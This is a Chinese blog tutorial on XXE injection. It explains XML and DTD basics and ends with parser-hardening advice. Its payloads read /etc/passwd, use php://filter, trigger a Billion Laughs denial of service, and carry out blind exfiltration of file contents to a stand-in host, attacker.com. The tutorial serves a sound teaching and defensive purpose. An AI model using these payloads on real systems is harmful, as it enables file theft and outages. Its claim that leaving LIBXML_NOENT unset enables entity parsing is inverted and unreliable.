web 安全之 XXE 漏洞-CSDN博客

本文链接：https://blog.csdn.net/2301_79518550/article/details/146875558

在现代Web应用和数据交换中，XML（可扩展标记语言）以其灵活性和跨平台性成为不可或缺的技术标准。然而，这种灵活性的背后也埋藏着安全隐患，其中最“臭名昭著”的便是XXE（XML外部实体注入）漏洞。XXE能够让攻击者读取敏感文件、探测内部网络，甚至执行远程代码，威胁范围从数据泄露到系统瘫痪无所不包。

本文将从XML和DTD的基础知识入手，循序渐进地剖析XXE漏洞的原理、利用方式及其危害。

一、XML基础知识

1. 什么是XML

XML（eXtensible Markup Language，可扩展标记语言）是一种用于存储和传输数据的标记语言，由W3C（World Wide Web Consortium，万维网联盟）制定并推荐为标准。与HTML不同，XML并不关注数据的显示，而是专注于数据的结构化和跨平台传输。XML的设计目标是提供一种通用的、灵活的数据格式，广泛应用于Web服务、配置文件、数据交换等领域。

XML的主要特点包括：

可扩展性：用户可以自定义标签和结构。
结构化：通过嵌套元素清晰表达数据层次。
跨平台性：与编程语言和系统无关，易于解析和处理。

2. XML的基本格式

XML文档通常以一个可选的XML声明（XML Prolog）开头，用于指定版本和字符编码。例如：

<?xml version="1.0" encoding="UTF-8"?>

version：XML的版本号，常用值为1.0。
encoding：字符编码，常见为UTF-8或ISO-8859-1。

XML的基本语法规则如下：

闭合标签：所有元素必须有开始和结束标签，例如<tag>content</tag>。
大小写敏感：<Tag>和<tag>被视为不同标签。
正确嵌套：元素不能交叉，例如<a><b></b></a>是合法的，而<a><b></a></b>是非法的。
根元素：每个XML文档必须有一个唯一的根元素包裹所有内容。
属性引号：属性值必须用单引号或双引号包裹，例如<tag attr="value">。

示例：

<?xml version="1.0" encoding="UTF-8"?>
<root>
    <name>Alice</name>
    <age>25</age>
</root>

3. XML中的实体引用

XML中某些特殊字符（如<、>、&等）具有特殊含义，直接使用会导致解析错误。为解决这个问题，XML引入了实体引用（Entity Reference）来转义这些字符。XML预定义了以下五种实体引用：

特殊字符	实体引用	描述
`<`	`<`	小于号
`>`	`>`	大于号
`&`	`&`	和号
`'`	`'`	单引号
`"`	`"`	双引号

示例：

<message>This is a test &lt;example&gt;</message>

解析后显示为：This is a test <example>。

实体引用不仅限于预定义字符，用户还可以通过DTD自定义实体，这为XXE漏洞的利用提供了基础。

二、DTD基础知识

1. 什么是DTD

DTD（Document Type Definition，文档类型定义）是XML的格式规范，用于定义XML文档的结构和语义约束。它规定了哪些元素、属性是合法的，以及它们之间的嵌套关系。DTD可以嵌入在XML文档中（内部DTD），也可以存储在外部文件中并通过引用引入（外部DTD）。

DTD的主要作用：

验证XML文档的合法性。
定义可重用的实体（如字符串或外部资源）。
提供结构化的约束，确保数据符合预期格式。

2. DTD的声明方式

(1) 内部DTD

内部DTD直接定义在XML文档的<!DOCTYPE>标签内，适用于小型或独立文档。

语法：

<!DOCTYPE 根元素名称 [元素声明]>

示例：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
    <!ELEMENT note (to, from, heading, body)>
    <!ELEMENT to (#PCDATA)>
    <!ELEMENT from (#PCDATA)>
    <!ELEMENT heading (#PCDATA)>
    <!ELEMENT body (#PCDATA)>
]>
<note>
    <to>Alice</to>
    <from>Bob</from>
    <heading>Hello</heading>
    <body>How are you?</body>
</note>

<!ELEMENT>：定义元素的名称和内容类型。
#PCDATA：表示“可解析的字符数据”（Parsed Character Data）。

(2) 外部DTD

外部DTD将定义存储在独立文件中，通过SYSTEM或PUBLIC关键字引入。

SYSTEM引用：指向自定义的本地或远程DTD文件。
语法：

<!DOCTYPE 根元素名称 SYSTEM "DTD文件路径">

示例：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
    <to>Alice</to>
</note>

note.dtd内容：

<!ELEMENT note (to)>
<!ELEMENT to (#PCDATA)>

PUBLIC引用：引用标准化的公开DTD（如HTML的DTD）。
语法：

<!DOCTYPE 根元素名称 PUBLIC "DTD标识符" "DTD URL">

示例：

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
    <head><title>Test</title></head>
    <body><p>Hello</p></body>
</html>

3. DTD中的核心概念

(1) 元素声明

定义XML文档中允许的元素及其内容类型。

语法：

<!ELEMENT 元素名称 类别>

类别值：

(#PCDATA)：字符数据。
EMPTY：空元素，无内容。
ANY：任意内容。
(child1, child2)：指定子元素的顺序和结构。

示例：

<!ELEMENT person (name, age)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>

(2) 实体（Entity）

实体是DTD中用于定义可重用内容的机制，分为一般实体和参数实体。

一般实体
用于在XML内容中引用，语法为&实体名称;。

内部定义：

<!ENTITY 实体名称 "实体内容">

示例：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
    <!ENTITY demo "Hello, World">
]>
<test>&demo;</test>

输出：Hello, World。

外部定义：

<!ENTITY 实体名称 SYSTEM "URL">

示例：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
    <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<test>&file;</test>

如果解析器支持外部实体，可能会读取/etc/passwd文件内容。

参数实体
用于在DTD内部引用，语法为%实体名称;。只能在DTD中使用。

内部定义：

<!ENTITY % 实体名称 "实体内容">

示例：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
    <!ENTITY % data "Hello">
    <!ENTITY content "%data; World">
]>
<test>&content;</test>

输出：Hello World。

外部定义：
```
<!ENTITY % 实体名称 SYSTEM "URL">
```

三、什么是XXE漏洞

1. XXE定义

XXE（XML External Entity Injection，XML外部实体注入）是一种安全漏洞，发生在应用程序解析用户提交的XML输入时，未正确禁用或限制外部实体的加载。攻击者通过构造恶意的XML payloads，利用外部实体读取服务器文件、发起网络请求，甚至执行更复杂的攻击。

2. XXE的成因

XXE漏洞的根本原因在于XML解析器支持DTD和外部实体，且未妥善配置安全选项。常见触发条件：

应用程序接受用户输入的XML数据。
XML解析器启用了外部实体解析（默认行为）。
缺乏输入验证或过滤。

例如，PHP的libxml库在默认情况下支持外部实体解析：

$xml = simplexml_load_string($user_input, LIBXML_NOENT);

如果未设置LIBXML_NOENT，外部实体将被解析。

3. XXE的基本利用

(1) 读取本地文件

攻击者通过外部实体读取服务器上的敏感文件。

Payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

如果服务器解析此XML，可能会返回/etc/passwd的内容。

(2) 发起网络请求

利用外部实体向攻击者控制的服务器发送请求。

Payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">
]>
<root>&xxe;</root>

服务器会请求evil.dtd，攻击者可通过日志捕获请求。

四、XXE进阶利用

1. 使用参数实体实现复杂攻击

参数实体可以嵌套定义，常用于盲XXE（Blind XXE）场景，即服务器不直接回显数据。

示例：盲XXE数据外带

Payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
    %dtd;
    %send;
]>
<root>&xxe;</root>

evil.dtd内容：

<!ENTITY % send "<!ENTITY xxe SYSTEM 'http://attacker.com/?data=%file;'>">

服务器解析后，会将/etc/passwd内容通过URL参数发送到attacker.com。

2. 使用伪协议

在某些环境中（如PHP），支持伪协议（如php://filter）读取文件。

Payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>

返回的内容将是/etc/passwd的Base64编码，避免直接暴露不可解析字符。

3. XXE的DoS攻击

构造递归实体定义，导致解析器耗尽资源。

Payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ENTITY xxe "A">
    <!ENTITY xxe1 "&xxe;&xxe;">
    <!ENTITY xxe2 "&xxe1;&xxe1;">
    <!ENTITY xxe3 "&xxe2;&xxe2;">
    <!-- 无限递归 -->
]>
<root>&xxe3;</root>

此攻击称为“亿笑攻击”（Billion Laughs），会迅速耗尽内存。

五、XXE的危害

敏感数据泄露
XXE允许攻击者读取服务器上的任意文件，例如配置文件、源代码、用户凭据或系统密码文件（如/etc/passwd）。这种能力使得敏感信息暴露的风险急剧增加，可能导致身份盗用、业务逻辑泄露等严重后果。
内部网络探测
通过构造特定的外部实体，攻击者能够扫描服务器所在内部网络，探测未公开的服务、端口或应用。这种信息搜集为后续的定向攻击奠定了基础，显著提升了攻击的成功率。
服务器端请求伪造（SSRF）
XXE可迫使服务器向内部系统或外部资源发起请求。攻击者利用这一点，可能触发未授权的数据交互，甚至通过与内部服务的通信窃取更多机密信息。
远程代码或命令执行
在某些极端情况下，当XML解析器支持特定扩展功能（如某些Java库的特性）时，XXE可能被用于加载恶意资源，进而执行远程代码或系统命令。这种攻击一旦成功，服务器可能被完全控制。
拒绝服务攻击（DoS）
XXE的经典利用方式之一是构造递归实体（如“亿笑攻击”），通过无限扩展实体引用耗尽服务器的内存和CPU资源。此外，指向大型外部资源或恶意构造的XML文档也能显著降低系统可用性。
绕过防火墙限制
XXE允许攻击者利用服务器作为代理，向内部网络资源发送请求，从而绕过外部防火墙的访问限制。这使得原本无法直接接触的敏感系统暴露在威胁之下。
植入恶意内容
在特定场景中，攻击者可能通过XXE将恶意数据注入系统，例如篡改日志文件或数据库内容，破坏数据的完整性，甚至为后续攻击埋下伏笔。

六、XXE的检测与防御

1. 检测方法

手动测试：提交包含外部实体的XML，观察响应。
自动化工具：Burp Suite、XXEinjector等。
特征检查：服务器是否回显文件内容或发起外部请求。

2. 防御措施

禁用外部实体：

PHP：
```
libxml_disable_entity_loader(true);
```

Java（SAXParser）：

saxParserFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
saxParserFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);